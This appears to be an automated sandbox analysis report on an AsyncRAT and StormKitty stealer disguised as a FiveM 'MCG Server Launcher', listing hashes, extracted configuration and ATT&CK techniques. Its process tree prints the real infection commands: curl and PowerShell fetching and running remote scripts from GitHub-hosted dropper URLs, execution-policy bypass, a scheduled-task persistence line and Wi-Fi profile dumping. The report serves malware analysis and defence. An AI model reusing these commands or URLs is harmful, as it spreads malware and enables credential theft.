asyncrat | 1cc3f1cc3b268f29acadd420ca19b80491851c9c69f833960d3674b324dea122

Analysis

max time kernel
447s
max time network
593s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
02/06/2024, 04:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MCG Server Launcher/MCG Server Launcher.exe
Size

2.1MB
MD5

3584a02b77f639b7d7fabe08797bb6eb
SHA1

906e6a9044eae39ab17e60e28c4de5a9807c65b3
SHA256

1c5c9ce6f9339eb57d39c35b166b5f64e8ea7f427d988aaa3a7d95ce81225e72
SHA512

72942199d4ee6146055919de00a224ae90a08e0c5c58f9155a9beca7f986169bbcb8e09e59cae16e83e29e59521cbad77ccf958550abd92a4fbeb0db6e9a43a0
SSDEEP

49152:j8mi6FoJtr7uht5r+LXKX6wZYKWHPo6lW9ssdrdjeN:j8mi6F4RujsLXmxMvnA91xeN

Score

10^/10

asyncrat stormkitty default collection discovery execution rat spyware stealer

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://github.com/kevinsocute2/exetemp/releases/download/powershell/System.exe

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.5

Botnet

Default

Mutex

wdgbejlkhzx

Attributes

c2_url_file
https://raw.githubusercontent.com/kevinsocute2/exetemp/main/ip.txt
delay
1
install
true
install_file
Registry.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 1 IoCs

resource	yara_rule
behavioral4/memory/1212-1008-0x000000001C370000-0x000000001C492000-memory.dmp	family_stormkitty

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral4/files/0x0007000000023609-790.dat	family_asyncrat

Blocklisted process makes network request 3 IoCs

flow	pid	Process
36	2156	powershell.exe
45	5004	powershell.exe
47	5004	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3256	powershell.exe
4624	powershell.exe
2156	powershell.exe
5004	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	MCG Server Launcher.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	CitizenFX.exe.new
Key value queried	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation	System.exe

Executes dropped EXE 7 IoCs

pid	Process
3248	FiveM.exe
2068	CitizenFX.exe.new
5072	FiveM.exe
1908	FiveM.exe
2376	System.exe
3544	FiveM_b2699_DumpServer
1212	Registry.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Registry.exe
Key opened	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Registry.exe
Key opened	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Registry.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Drops desktop.ini file(s) 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Videos\Captures\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Local\FiveM\FiveM.app\desktop.ini	FiveM.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

flow	ioc
36	raw.githubusercontent.com
60	raw.githubusercontent.com
93	discord.com
94	discord.com
9	raw.githubusercontent.com
10	raw.githubusercontent.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
83	icanhazip.com
86	ip-api.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	Registry.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	Registry.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
364	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
2356	timeout.exe

Modifies Control Panel 2 IoCs

evasion

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\Colors	FiveM.exe
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\Colors	FiveM.exe

Modifies registry class 23 IoCs

description	ioc	Process
Set value (data)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	FiveM.exe
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	FiveM.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	FiveM.exe
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	FiveM.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	FiveM.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	FiveM.exe
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	FiveM.exe
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	FiveM.exe
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings	FiveM.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	FiveM.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	FiveM.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	FiveM.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	FiveM.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	FiveM.exe
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	FiveM.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3571316656-3665257725-2415531812-1000\{B3F244F0-FB4E-4F07-BF77-BD17ABAD83B6}	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	FiveM.exe
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	FiveM.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	FiveM.exe
Key created	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	FiveM.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	FiveM.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3571316656-3665257725-2415531812-1000\{AC0CC6A7-8B50-4991-BA59-A1B178737F04}	svchost.exe

Suspicious behavior: EnumeratesProcesses 63 IoCs

pid	Process
4624	powershell.exe
4624	powershell.exe
2156	powershell.exe
2156	powershell.exe
2156	powershell.exe
3256	powershell.exe
3256	powershell.exe
3256	powershell.exe
5004	powershell.exe
5004	powershell.exe
5004	powershell.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
2376	System.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe
1212	Registry.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	4624	powershell.exe
Token: SeDebugPrivilege	2156	powershell.exe
Token: SeDebugPrivilege	3256	powershell.exe
Token: SeDebugPrivilege	5004	powershell.exe
Token: SeDebugPrivilege	2376	System.exe
Token: SeDebugPrivilege	1212	Registry.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
3248	FiveM.exe
1908	FiveM.exe

Suspicious use of SetWindowsHookEx 8 IoCs

pid	Process
3248	FiveM.exe
1404	OpenWith.exe
1908	FiveM.exe
3604	OpenWith.exe
1908	FiveM.exe
1908	FiveM.exe
3344	OpenWith.exe
1212	Registry.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2884 wrote to memory of 3292	2884	MCG Server Launcher.exe	82
PID 2884 wrote to memory of 3292	2884	MCG Server Launcher.exe	82
PID 2884 wrote to memory of 3292	2884	MCG Server Launcher.exe	82
PID 2884 wrote to memory of 3248	2884	MCG Server Launcher.exe	84
PID 2884 wrote to memory of 3248	2884	MCG Server Launcher.exe	84
PID 3292 wrote to memory of 3116	3292	cmd.exe	85
PID 3292 wrote to memory of 3116	3292	cmd.exe	85
PID 3292 wrote to memory of 3116	3292	cmd.exe	85
PID 3292 wrote to memory of 4624	3292	cmd.exe	90
PID 3292 wrote to memory of 4624	3292	cmd.exe	90
PID 3292 wrote to memory of 4624	3292	cmd.exe	90
PID 3248 wrote to memory of 2068	3248	FiveM.exe	92
PID 3248 wrote to memory of 2068	3248	FiveM.exe	92
PID 2068 wrote to memory of 5072	2068	CitizenFX.exe.new	93
PID 2068 wrote to memory of 5072	2068	CitizenFX.exe.new	93
PID 5072 wrote to memory of 1908	5072	FiveM.exe	94
PID 5072 wrote to memory of 1908	5072	FiveM.exe	94
PID 4624 wrote to memory of 3852	4624	powershell.exe	99
PID 4624 wrote to memory of 3852	4624	powershell.exe	99
PID 4624 wrote to memory of 3852	4624	powershell.exe	99
PID 3852 wrote to memory of 2764	3852	cmd.exe	102
PID 3852 wrote to memory of 2764	3852	cmd.exe	102
PID 3852 wrote to memory of 2764	3852	cmd.exe	102
PID 3852 wrote to memory of 2784	3852	cmd.exe	103
PID 3852 wrote to memory of 2784	3852	cmd.exe	103
PID 3852 wrote to memory of 2784	3852	cmd.exe	103
PID 3852 wrote to memory of 1932	3852	cmd.exe	104
PID 3852 wrote to memory of 1932	3852	cmd.exe	104
PID 3852 wrote to memory of 1932	3852	cmd.exe	104
PID 3852 wrote to memory of 3444	3852	cmd.exe	105
PID 3852 wrote to memory of 3444	3852	cmd.exe	105
PID 3852 wrote to memory of 3444	3852	cmd.exe	105
PID 3852 wrote to memory of 2532	3852	cmd.exe	106
PID 3852 wrote to memory of 2532	3852	cmd.exe	106
PID 3852 wrote to memory of 2532	3852	cmd.exe	106
PID 3852 wrote to memory of 4592	3852	cmd.exe	107
PID 3852 wrote to memory of 4592	3852	cmd.exe	107
PID 3852 wrote to memory of 4592	3852	cmd.exe	107
PID 3852 wrote to memory of 4796	3852	cmd.exe	109
PID 3852 wrote to memory of 4796	3852	cmd.exe	109
PID 3852 wrote to memory of 4796	3852	cmd.exe	109
PID 3852 wrote to memory of 4152	3852	cmd.exe	110
PID 3852 wrote to memory of 4152	3852	cmd.exe	110
PID 3852 wrote to memory of 4152	3852	cmd.exe	110
PID 3852 wrote to memory of 4068	3852	cmd.exe	112
PID 3852 wrote to memory of 4068	3852	cmd.exe	112
PID 3852 wrote to memory of 4068	3852	cmd.exe	112
PID 3852 wrote to memory of 2156	3852	cmd.exe	113
PID 3852 wrote to memory of 2156	3852	cmd.exe	113
PID 3852 wrote to memory of 2156	3852	cmd.exe	113
PID 3852 wrote to memory of 3256	3852	cmd.exe	115
PID 3852 wrote to memory of 3256	3852	cmd.exe	115
PID 3852 wrote to memory of 3256	3852	cmd.exe	115
PID 3256 wrote to memory of 5004	3256	powershell.exe	116
PID 3256 wrote to memory of 5004	3256	powershell.exe	116
PID 3256 wrote to memory of 5004	3256	powershell.exe	116
PID 5004 wrote to memory of 2376	5004	powershell.exe	121
PID 5004 wrote to memory of 2376	5004	powershell.exe	121
PID 2376 wrote to memory of 3980	2376	System.exe	122
PID 2376 wrote to memory of 3980	2376	System.exe	122
PID 2376 wrote to memory of 3384	2376	System.exe	123
PID 2376 wrote to memory of 3384	2376	System.exe	123
PID 3384 wrote to memory of 2356	3384	cmd.exe	126
PID 3384 wrote to memory of 2356	3384	cmd.exe	126

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Registry.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	Registry.exe

C:\Users\Admin\AppData\Local\Temp\MCG Server Launcher\MCG Server Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\MCG Server Launcher\MCG Server Launcher.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2884
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3292
- - C:\Windows\SysWOW64\curl.exe
    curl -L -o "C:\Users\Admin\AppData\Local\Temp\temp.bat" "https://raw.githubusercontent.com/kevinsocute2/exetemp/main/temp.bat"
    3⤵
    PID:3116
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\temp.bat' -Verb RunAs -WindowStyle Hidden"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4624
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\temp.bat"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3852
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp.com 437
        5⤵
        
        PID:2764
    - - C:\Windows\SysWOW64\find.exe
        
        fInd
        5⤵
        
        PID:2784
    - - C:\Windows\SysWOW64\find.exe
        
        find
        5⤵
        
        PID:1932
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /L /I set C:\Users\Admin\AppData\Local\Temp\temp.bat
        5⤵
        
        PID:3444
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /L /I goto C:\Users\Admin\AppData\Local\Temp\temp.bat
        5⤵
        
        PID:2532
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /L /I echo C:\Users\Admin\AppData\Local\Temp\temp.bat
        5⤵
        
        PID:4592
    - - C:\Windows\SysWOW64\findstr.exe
        
        findstr /L /I pause C:\Users\Admin\AppData\Local\Temp\temp.bat
        5⤵
        
        PID:4796
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c type tmp
        5⤵
        
        PID:4152
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c type tmp
        5⤵
        
        PID:4068
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -Command "& {Invoke-WebRequest -Uri \"https://raw.githubusercontent.com/kevinsocute2/exetemp/main/script.ps1\" -OutFile \"C:\Users\Admin\AppData\Local\Temp\script.ps1\"}"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2156
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -ExecutionPolicy Bypass -Command "& {Start-Process powershell.exe -ArgumentList '-ExecutionPolicy Bypass -File \"C:\Users\Admin\AppData\Local\Temp\script.ps1\"' -Verb RunAs -WindowStyle Hidden}"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3256
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\script.ps1"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:5004
        
        C:\Users\Admin\AppData\Roaming\Microsoft\HiddenStartup\MyScriptTemp2\System.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\HiddenStartup\MyScriptTemp2\System.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2376
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Registry" /tr '"C:\Users\Admin\AppData\Roaming\Registry.exe"' & exit
        8⤵
        
        PID:3980
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "Registry" /tr '"C:\Users\Admin\AppData\Roaming\Registry.exe"'
        9⤵
        Creates scheduled task(s)
        
        PID:364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpBFC6.tmp.bat""
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:3384
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        9⤵
        Delays execution with timeout.exe
        
        PID:2356
        
        C:\Users\Admin\AppData\Roaming\Registry.exe
        
        "C:\Users\Admin\AppData\Roaming\Registry.exe"
        9⤵
        Executes dropped EXE
        Accesses Microsoft Outlook profiles
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        outlook_office_path
        outlook_win_path
        
        PID:1212
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        10⤵
        
        PID:4932
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:5024
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show profile
        11⤵
        
        PID:2140
        
        C:\Windows\system32\findstr.exe
        
        findstr All
        11⤵
        
        PID:676
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
        10⤵
        
        PID:4624
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        11⤵
        
        PID:2676
        
        C:\Windows\system32\netsh.exe
        
        netsh wlan show networks mode=bssid
        11⤵
        
        PID:2160
- C:\Users\Admin\AppData\Local\Temp\FiveM.exe
  "C:\Users\Admin\AppData\Local\Temp\FiveM.exe"
  2⤵
  - Executes dropped EXE
  - Modifies Control Panel
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3248
- - C:\Users\Admin\AppData\Local\Temp\CitizenFX.exe.new
    CitizenFX.exe.new -bootstrap "C:\Users\Admin\AppData\Local\Temp\FiveM.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2068
  - - C:\Users\Admin\AppData\Local\Temp\FiveM.exe
      "C:\Users\Admin\AppData\Local\Temp\FiveM.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:5072
    - - C:\Users\Admin\AppData\Local\FiveM\FiveM.exe
        
        "C:\Users\Admin\AppData\Local\FiveM\FiveM.exe"
        5⤵
        Executes dropped EXE
        Drops desktop.ini file(s)
        Modifies Control Panel
        Modifies registry class
        Suspicious use of FindShellTrayWindow
        Suspicious use of SetWindowsHookEx
        
        PID:1908
      - C:\Users\Admin\AppData\Local\FiveM\FiveM.app\data\cache\subprocess\FiveM_b2699_DumpServer
        
        "C:\Users\Admin\AppData\Local\FiveM\FiveM.app\data\cache\subprocess\FiveM_b2699_DumpServer" -dumpserver:2132 -parentpid:1908
        6⤵
        Executes dropped EXE
        
        PID:3544

C:\Windows\System32\GameBarPresenceWriter.exe
"C:\Windows\System32\GameBarPresenceWriter.exe" -ServerName:Windows.Gaming.GameBar.Internal.PresenceWriterServer
1⤵
PID:3644

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:1404

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
PID:2800

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:3604

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
1⤵
- Checks processor information in registry
- Modifies registry class
PID:4228

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:3344

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\63d6df59fe784065661dd626b8042026\Admin@YCLEXTAL_en-US\System\Process.txt

Filesize
2KB

MD5
6c75965809b7034777d85ab729270c0e

SHA1
1ef57035f6cd6dd4ac740ef570690d7e2db05bd7

SHA256
40f4357f45902581079fc8be453b0e907cf898f91366162b26936f50eac67339

SHA512
a5e528336901e93139ab19c6774da6de7a3dbe6cdddd65fa682925bf4035cdf2028b49ede369b421ac6b0b8ab007734b98a2ebba13f0e6f9bf7e9315e9d5757b

Download Submit
C:\Users\Admin\AppData\Local\63d6df59fe784065661dd626b8042026\Admin@YCLEXTAL_en-US\System\Process.txt

Filesize
4KB

MD5
797aa5c9d565b8079ddc843ae4400c76

SHA1
6d249b9f30b8a8a944e3eda8cd29747b10b06eca

SHA256
6c4f734262185d6fb35c33361a9e4688d2afe84b61116f32f65900868299f9c2

SHA512
0ff9eebbb3b71dc5a76fb2d8fca75966ea5b53034d965cc6713504df4eef53c722ce34ded34d97b7f4c5d85518f6129c1161f10828c35f854f0b21bd73f6e023

Download Submit
C:\Users\Admin\AppData\Local\63d6df59fe784065661dd626b8042026\msgid.dat

Filesize
1B

MD5
cfcd208495d565ef66e7dff9f98764da

SHA1
b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

SHA256
5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

SHA512
31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

Download Submit
C:\Users\Admin\AppData\Local\FiveM\FiveM.app\citizen\platform-2372\data\control\settings.meta.tmp

Filesize
37KB

MD5
3656c6636cd9dbceaf83230c3c9a2be9

SHA1
989f27c6736a943fd4690091fed26f7c17e3c17f

SHA256
f9ae094812ce9fbd56b58dab7739451792aba8f56c5f21eee15ef96682b413a6

SHA512
52bbb8f2b2d6183f30b908d9171a2ec8c2128bbce145b7af0095d4c199b1ec431d650ec4ed0b1b6cbc7bcc8d29da3285cdcc61368faa8c4e57b45315ced4e4ad

Download Submit
C:\Users\Admin\AppData\Local\FiveM\FiveM.app\citizen\platform-3095\data\control\settings.meta.tmp

Filesize
39KB

MD5
619814b8b98007c1698576b7e4efb3ec

SHA1
e60f3ceaf5ca78f74e6867f0b042951bffb91786

SHA256
71ad5591441d62d02d2b62155abcf2cab587af49b86e2db5be6729a5b39df5d1

SHA512
55ab0bd3c1750d63ad3304e63b7c26251f01c8994f385e5643e2bbd37fc6595fd0e9f5fc0d76aa655fe8ad3bc6fdee33248d9f4a76cce11a25d84c3f5de16236

Download Submit
C:\Users\Admin\AppData\Local\FiveM\FiveM.app\citizen\release.txt

Filesize
6B

MD5
bc0d2ef702db446712420b39a4e92250

SHA1
fbf03c92c01bd42022829b761b2bc1f6f6ccc810

SHA256
0c7271249d4e34ef9ca98d5c3b622096a7f08568cc88336ac6c0a2d89953e35c

SHA512
5c03d84075574f4eeeac5eceff55f590d9ffb289e20ab8a904ec79a221fa105b0f07979c4bf295a7f4e4e1ad81a4c6e6ec4f851f0c80e0c678d710e37b5840d8

Download Submit
C:\Users\Admin\AppData\Local\FiveM\FiveM.app\citizen\scripting\lua\natives_universal.lua.tmp

Filesize
1.8MB

MD5
559cc98140d4eff894bdf2b3f6ce2a73

SHA1
1665ac2284d16bcc1fdd319b023b1d12f1cad343

SHA256
dba50975b85ca95d0c41d10ff885c48576aa938731dd56c06af03f46d046e267

SHA512
